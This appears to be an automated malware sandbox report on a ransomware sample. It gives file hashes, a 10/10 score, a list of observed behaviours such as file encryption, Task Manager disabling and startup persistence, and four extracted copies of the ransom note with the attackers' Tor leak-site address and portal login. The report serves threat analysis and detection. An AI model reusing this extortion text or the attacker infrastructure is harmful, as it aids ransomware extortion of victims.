General

  • Target

    731797d30d8ff6eaf901e788bd4e6048

  • Size

    108KB

  • Sample

    240124-225daaagg8

  • MD5

    731797d30d8ff6eaf901e788bd4e6048

  • SHA1

    9d38ce8e4c3ca5fbdfdfbed3ec452151041189c0

  • SHA256

    66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2

  • SHA512

    ecb89742be1e524d0abf25fcc4d0a5a4df5e3fa357b2179289efe1569da32dd7372226bba955837c84900ec389568db76d70787a141456a3885b71b1e6e8243b

  • SSDEEP

    1536:wjKfwB0Z6geEfm5YHrXXx/R6lsV3zH9/9FUWIQHL2ukcxw14CmV:bfK0ZFfm5Y7BR6lc9FUFQHL2Fcx1t

Score
10/10

Malware Config

Extracted

Path

C:\RESTORE_FILES_INFO.txt

Ransom Note
-------=== Your network has been infected! ===------- ***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED*** All your documents, photos, databases and other important files have been encrypted . You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news webs http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- 1.Download Tor browser - https://www.torproject.org/ 2.Install Tor browser 3.Open link in Tor browser -http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion 4.Use login:Chaddadgroup password: Chaddadgroup 5.Follow the instructions on this page * DO NOT TRY TO RECOVER FILES YOURSELF!* * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * Key Identifier: EQfmUpqG7C/gcCrbiiUCnxSHm2JaeCR3wOsnGBujBjIkrIT51Xbzl3yCP9YFRq1mRwWIRmOQdbOVUS02P15UnepXHMN1gtcUtQxPXq9lWN8u8aBJvYIFEjNXLvsHkv0xuZms3zL4YJ6IZAoX7v2IBJH2kDm0sU891AbiaZh6Our/z+RLQmcE++EalikSN/LDxO5Nok04eRRPWLyf/fMz9cFUV7jdE6Z+5lcMa+fxont2to1hgz3a7TuPCPVOpjbRl9t9kdR+VGIJpmDHjv6Uad8VvWAXln9W5ytxvH5AQff4qR6rOA93WBLMHkkq2vd6VvVTKtflPj1kphwx3tCZLhp2YcRtKn9eSl+RGC9lrhGigh2uWeOzH2xNseGL9DiU2SMEKxN4gLOU6DZEjgDhG+8PHlcIkeDAMdsDoi6e+xdn6oHVP8ddir8coaVtsTRMQmAuSIDjzf96LJ0tueji7/iqQRNFdwqtIzE1FAxIlB+GlHQ1qlIizBfduJp/+F+HmU3p/V73FeczTWgi6YfkIKHQB09RkM8hSe9sQyTF0cJETrNt6HH7HkbJqCebvNuZYrtjIwuH9UYuWO8LjD/6Nam0zKljJ4sLIK2EgQ/mqrIZbuWwLn3XNVtrOZmm8E9Xu7bJrymEX14pn3wpQD9FIWVBbeOAjoJ/oWvnNYhHNMc=
URLs

http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note
-------=== Your network has been infected! ===------- ***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED*** All your documents, photos, databases and other important files have been encrypted . You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news webs http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- 1.Download Tor browser - https://www.torproject.org/ 2.Install Tor browser 3.Open link in Tor browser -http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion 4.Use login:Chaddadgroup password: Chaddadgroup 5.Follow the instructions on this page * DO NOT TRY TO RECOVER FILES YOURSELF!* * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * Key Identifier: EQfmUpqG7C/gcCrbiiUCnxSHm2JaeCR3wOsnGBujBjIkrIT51Xbzl3yCP9YFRq1mRwWIRmOQdbOVUS02P15UnepXHMN1gtcUtQxPXq9lWN8u8aBJvYIFEjNXLvsHkv0xuZms3zL4YJ6IZAoX7v2IBJH2kDm0sU891AbiaZh6Our/z+RLQmcE++EalikSN/LDxO5Nok04eRRPWLyf/fMz9cFUV7jdE6Z+5lcMa+fxont2to1hgz3a7TuPCPVOpjbRl9t9kdR+VGIJpmDHjv6Uad8VvWAXln9W5ytxvH5AQff4qR6rOA93WBLMHkkq2vd6VvVTKtflPj1kphwx3tCZLhp2YcRtKn9eSl+RGC9lrhGigh2uWeOzH2xNseGL9DiU2SMEKxN4gLOU6DZEjgDhG+8PHlcIkeDAMdsDoi6e+xdn6oHVP8ddir8coaVtsTRMQmAuSIDjzf96LJ0tueji7/iqQRNFdwqtIzE1FAxIlB+GlHQ1qlIizBfduJp/+F+HmU3p/V73FeczTWgi6YfkIKHQB09RkM8hSe9sQyTF0cJETrNt6HH7HkbJqCebvNuZYrtjIwuH9UYuWO8LjD/6Nam0zKljJ4sLIK2EgQ/mqrIZbuWwLn3XNVtrOZmm8E9Xu7bJrymEX14pn3wpQD9FIWVBbeOAjoJ/oWvnNYhHNMc=
URLs

http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion

Extracted

Path

C:\RESTORE_FILES_INFO.txt

Ransom Note
-------=== Your network has been infected! ===------- ***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED*** All your documents, photos, databases and other important files have been encrypted . You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news webs http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- 1.Download Tor browser - https://www.torproject.org/ 2.Install Tor browser 3.Open link in Tor browser -http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion 4.Use login:Chaddadgroup password: Chaddadgroup 5.Follow the instructions on this page * DO NOT TRY TO RECOVER FILES YOURSELF!* * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * Key Identifier: IKbPozlCRxtydMvMou+zd7wkmR/rVUGh/xqiqblieMK3oEcOXDde1xsDV9xs0bbjSDeFKAVUyA916jltF1nbS0E1Zqk0Wlgntr9qd6nz1yOq0JPv1B/g68e/ncTpza5T95cilxoKItD6cYWuP0JYzh/yCvHXM6wOtErlVsect8UPSJyNHyJZdnEs041g9ozRdCo2tAunjAGUZ1c2QW3163iQeDwwHkwi1E/n69ySaS98nUpAWGnd2GNGAOxYBtnNqK47Cn5ot3AK5j1YT2AM32kbvYSy6L0g0J5RNqn/bb5p2UxcFCvVmPgzzMcBiLVx7qZ1nksJmOLu+DWAYdrVxdu1MhUIoKpckBi2dcKELNTjvByo9dZTNRTcW9Xv5+s92AYQErMO17nrdzm3QIjiKF0K5VjYok+GU1Yd5MWI3aW2jVrjCJMhPP10wv+NQvaMwxuzg3BAC6bvka88EEoETvSKjVhKU6PFH/J3Bu3ZuwBWiPCiKdmx8PI8zZwYOaqD3+/qh+XNeAMgBHVrGnQnkSgKdpA/2Is901NWEIGMw/wDwa2ZlobMnpSrrtYiKq030AzshUycfOhWwjGqv/BQLvPBtni1Ea4k1ww05OvhvPrrMU2sUflhr42VEevckSHDTmWtQ8hKON4dv6tIvTfvRlvTQmVlcLp9j/aS67jhExc=
URLs

http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note
-------=== Your network has been infected! ===------- ***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED*** All your documents, photos, databases and other important files have been encrypted . You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news webs http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- 1.Download Tor browser - https://www.torproject.org/ 2.Install Tor browser 3.Open link in Tor browser -http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion 4.Use login:Chaddadgroup password: Chaddadgroup 5.Follow the instructions on this page * DO NOT TRY TO RECOVER FILES YOURSELF!* * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * Key Identifier: IKbPozlCRxtydMvMou+zd7wkmR/rVUGh/xqiqblieMK3oEcOXDde1xsDV9xs0bbjSDeFKAVUyA916jltF1nbS0E1Zqk0Wlgntr9qd6nz1yOq0JPv1B/g68e/ncTpza5T95cilxoKItD6cYWuP0JYzh/yCvHXM6wOtErlVsect8UPSJyNHyJZdnEs041g9ozRdCo2tAunjAGUZ1c2QW3163iQeDwwHkwi1E/n69ySaS98nUpAWGnd2GNGAOxYBtnNqK47Cn5ot3AK5j1YT2AM32kbvYSy6L0g0J5RNqn/bb5p2UxcFCvVmPgzzMcBiLVx7qZ1nksJmOLu+DWAYdrVxdu1MhUIoKpckBi2dcKELNTjvByo9dZTNRTcW9Xv5+s92AYQErMO17nrdzm3QIjiKF0K5VjYok+GU1Yd5MWI3aW2jVrjCJMhPP10wv+NQvaMwxuzg3BAC6bvka88EEoETvSKjVhKU6PFH/J3Bu3ZuwBWiPCiKdmx8PI8zZwYOaqD3+/qh+XNeAMgBHVrGnQnkSgKdpA/2Is901NWEIGMw/wDwa2ZlobMnpSrrtYiKq030AzshUycfOhWwjGqv/BQLvPBtni1Ea4k1ww05OvhvPrrMU2sUflhr42VEevckSHDTmWtQ8hKON4dv6tIvTfvRlvTQmVlcLp9j/aS67jhExc=
URLs

http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion

Targets

    • Target

      731797d30d8ff6eaf901e788bd4e6048

    • Size

      108KB

    • MD5

      731797d30d8ff6eaf901e788bd4e6048

    • SHA1

      9d38ce8e4c3ca5fbdfdfbed3ec452151041189c0

    • SHA256

      66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2

    • SHA512

      ecb89742be1e524d0abf25fcc4d0a5a4df5e3fa357b2179289efe1569da32dd7372226bba955837c84900ec389568db76d70787a141456a3885b71b1e6e8243b

    • SSDEEP

      1536:wjKfwB0Z6geEfm5YHrXXx/R6lsV3zH9/9FUWIQHL2ukcxw14CmV:bfK0ZFfm5Y7BR6lc9FUFQHL2Fcx1t

    Score
    10/10
    • Renames multiple (126) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Disables Task Manager via registry modification

    • Downloads MZ/PE file

    • Drops startup file

    • Drops desktop.ini file(s)

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15

Tasks